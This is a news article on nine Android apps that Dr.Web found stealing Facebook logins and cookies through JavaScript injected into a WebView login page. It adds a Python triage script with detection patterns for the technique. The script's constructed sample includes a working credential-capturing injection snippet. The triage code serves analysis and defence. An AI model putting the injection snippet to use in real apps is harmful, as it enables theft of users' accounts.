Google has removed nine Android apps from the Play Store, including one with millions of installs, after they were found to be stealing users' Facebook login credentials. Removal from the store does not uninstall the apps, however: copies already installed on phones keep running and continue to put their users at risk without their knowledge.
Discovered and described in detail on July 1 by malware analysts at Dr.Web, the apps, classified as stealer trojans, were distributed as harmless software and had been installed nearly 6 million times in total. Unlike some earlier cases of malicious Android apps, every app in this case actually delivered a working service, such as photo editing and framing, training and fitness, horoscopes, and junk-file cleaning.
These nine Android apps were stealing Facebook passwords
Applications include PIP Photo with up to 5 million installations; Processing Photo with up to 500,000 installations; Rubbish Cleaner, Horoscope Daily and Inwell Fitness with up to 100,000 installations; and App Lock Keep with up to 50,000 installs. Lockit Master, Horoscope Pi, and App Lock Manager rounded out the list.
The lure is an offer to disable in-app ads by logging in with a Facebook account. The analysts noted that some of the apps really did show ads, which made the offer more convincing and encouraged device owners to go through with the login.
Users who took the offer were shown what looked like the standard Facebook login form, with one difference: the genuine Facebook login page was loaded inside a WebView controlled by the app, and the app injected JavaScript into that WebView to capture whatever was typed into the login fields. Because script injected into a WebView runs with the loaded page's own origin, it can read the form fields and the page's cookies just as Facebook's own scripts can.
When a user entered their details, the injected JavaScript forwarded the username and password to the attackers' server. The victim noticed nothing, because the login to Facebook itself succeeded as normal. Once the victim was logged in, the trojan also harvested the cookies of the authenticated session, which lets an attacker reuse the session without needing the password again.
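As an added example (not code from Dr.Web, Google or the apps in question), the following Python script shows how an analyst might triage decompiled Android source for the pattern described above: a WebView with JavaScript enabled, a script injected into the loaded page, a JavaScript-to-native bridge and session cookie access, all around a hard-coded login URL. The two source snippets it scans are constructed for this example, as are the indicator names and the verdict thresholds; a real APK would first be run through a decompiler such as jadx and the resulting source tree fed in file by file.

```python
"""Static triage for the credential-stealing WebView pattern.

Added example; not code from Dr.Web or from the apps themselves.
Each indicator on its own is common in benign apps (many apps enable
JavaScript in a WebView); it is the combination of injected script,
a native bridge or cookie access, and a hard-coded third-party login
URL that warrants manual review. Indicator names, regexes and the
verdict thresholds are assumptions chosen for this example.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Android API calls the described attack needs (these APIs are real;
# the choice of which ones to flag is this example's own heuristic).
INDICATORS = {
    "js_enabled": re.compile(r"setJavaScriptEnabled\s*\(\s*true\s*\)"),
    "js_injection": re.compile(r'evaluateJavascript\s*\(|loadUrl\s*\(\s*"javascript:'),
    "js_bridge": re.compile(r"addJavascriptInterface\s*\("),
    "cookie_access": re.compile(r"CookieManager\.getInstance\(\)\.getCookie\s*\("),
    "login_url": re.compile(r"https?://[\w.-]*(facebook|fb|google|login|oauth)[\w./-]*", re.I),
}


@dataclass
class TriageResult:
    indicators: dict[str, list[int]]  # indicator name -> line numbers where it was seen
    verdict: str                      # "clean", "review" or "suspicious"


def scan_source(source: str) -> TriageResult:
    """Scan one decompiled source file and combine the indicators into a verdict."""
    hits: dict[str, list[int]] = {name: [] for name in INDICATORS}
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits[name].append(lineno)
    found = {name for name, lines in hits.items() if lines}
    required = {"js_enabled", "js_injection", "login_url"}
    exfil = {"js_bridge", "cookie_access"}
    if required <= found and found & exfil:
        verdict = "suspicious"        # script injected into a login page plus a way out
    elif found & {"js_injection", "js_bridge"}:
        verdict = "review"            # injection/bridge without a login URL: look closer
    else:
        verdict = "clean"
    return TriageResult(hits, verdict)


# Constructed decompiled Java resembling the behaviour described in the article.
MALICIOUS_SAMPLE = """
public class AdFreeLoginActivity extends Activity {
    private static final String LOGIN_URL = "https://m.facebook.com/login.php";
    protected void onCreate(Bundle b) {
        WebView web = new WebView(this);
        web.getSettings().setJavaScriptEnabled(true);
        web.addJavascriptInterface(new Bridge(), "android");
        web.setWebViewClient(new WebViewClient() {
            public void onPageFinished(WebView v, String url) {
                v.evaluateJavascript("(function(){var f=document.forms[0];f.addEventListener('submit',function(){android.send(f.email.value,f.pass.value);});})();", null);
                Bridge.sendCookies(CookieManager.getInstance().getCookie(url));
            }
        });
        web.loadUrl(LOGIN_URL);
    }
}
"""

# Constructed benign WebView: JavaScript enabled, but nothing injected and no login page.
BENIGN_SAMPLE = """
public class TermsActivity extends Activity {
    protected void onCreate(Bundle b) {
        WebView web = new WebView(this);
        web.getSettings().setJavaScriptEnabled(true);
        web.loadUrl("https://cdn.example.com/terms.html");
    }
}
"""


if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        result = scan_source(src)
        seen = {k: v for k, v in result.indicators.items() if v}
        print(f"{label}: verdict={result.verdict} indicators={seen}")
```

The verdict is only a triage aid: a "suspicious" hit should be confirmed by reading the injected script and the bridge class, and by watching the app's network traffic during a test login.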
Although this campaign targeted Facebook accounts, the same mechanism works against other services. The analysts explained that the attackers could easily change the trojans' configuration to make them load the login page of another legitimate service instead, so the same code could be used to steal logins and passwords for any site whose login form is rendered inside the WebView.
Google has not made a public statement about the apps, but they have been observed to be gone from the Play Store, and the developers behind them have been banned from publishing on Google Play.
Source: arstechnica